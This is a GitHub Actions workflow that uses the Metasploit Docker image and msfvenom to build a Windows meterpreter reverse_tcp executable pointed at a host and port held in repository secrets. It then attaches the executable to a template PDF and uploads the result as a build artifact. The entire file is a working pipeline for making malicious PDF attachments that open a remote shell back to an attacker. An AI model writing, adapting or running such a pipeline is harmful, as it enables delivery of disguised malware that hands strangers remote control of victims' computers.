name: Embed Windows Payload in PDF (Docker Metasploit)

on: [workflow_dispatch]

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout repository
        uses: actions/checkout@v4

      - name: Install mupdf-tools
        run: sudo apt-get update && sudo apt-get install -y mupdf-tools

      - name: Generate Windows payload with Metasploit Docker
        run: |
          docker run --rm -v $PWD:/data metasploitframework/metasploit-framework \
            msfvenom -p windows/meterpreter/reverse_tcp LHOST="${{ secrets.LHOST }}" LPORT="${{ secrets.LPORT }}" -f exe -o /data/shell.exe

      - name: Embed payload in PDF
        run: mutool attach template.pdf payload.pdf shell.exe

      - name: Upload PDF artifact
        uses: actions/upload-artifact@v4
        with:
          name: windows-pdf-payload
          path: payload.pdf
